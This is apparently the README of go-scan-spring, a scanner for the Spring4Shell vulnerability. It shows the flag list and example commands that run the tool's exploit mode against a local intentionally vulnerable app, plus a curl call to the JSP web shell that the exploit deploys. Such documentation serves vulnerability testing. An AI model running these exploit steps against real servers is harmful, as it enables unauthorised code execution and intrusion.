For more information: https://www.fracturelabs.com/posts/effective-spring4shell-scanning-exploitation/
[~/opt] $ git clone https://github.com/fracturelabs/go-scan-spring.git
[~/opt] $ cd go-scan-spring
[~/opt/go-scan-spring] $ go run main.go help scan
Run a scan against target URLs looking for vulnerable services
Usage:
go-scan-spring scan [flags]
Flags:
-f, --file string Target URL filename (- for stdin)
--follow-redirect Follow redirects
-h, --help help for scan
--http-get Test using HTTP GET requests (must set =false to disable) (default true)
--http-post Test using HTTP POST requests (must set =false to disable) (default true)
--identifier string Unique scan identifier (used as a password and an exploit filename) (default "go-scan-spring")
-x, --proxy string Upstream proxy
--run-baseline Run a baseline test to see if endpoint is up
--run-exploit Run an exploit to retrieve the owner of the Tomcat process
--run-safe Run a safe test to see if endpoint is vulnerable
-s, --sleep int Time to sleep between exploit steps. This is needed to allow time for deployment. (default 10)
-t, --threads int Number of threads (default 5)
Global Flags:
--debug enable debug logging
[~/opt/go-scan-spring] $ go run main.go scan --run-safe -f urls.txt
Use your own unique identifier
parameter!
# Using HTTP GETs and POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit
# Using only HTTP GETs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-post=false
# Using only HTTP POSTs
[~/opt/go-scan-spring] $ echo http://localhost:8080/spring4shell_victim/vulnerable | go run main.go scan -f - --identifier 550bafe0-0c6c-4f3e-a46b-0901c28e690b --run-exploit --http-get=false
You can verify the script works properly by testing against an intentionally vulnerable system, such as spring4shell_victim
[~] $ curl --output - 'http://localhost:8080/go-scan-spring/550bafe0-0c6c-4f3e-a46b-0901c28e690b-AD.jsp?pwd=550bafe0-0c6c-4f3e-a46b-0901c28e690b'
- The entire structure and several functions were borrowed heavily from the wonderful GoWitness project from SensePost.
- The safe check implemented in this was inspired by The Randori Attack Team and Zach Grace
- Whoever created the first PoC - stuff is moving too fast to properly attribute this right now!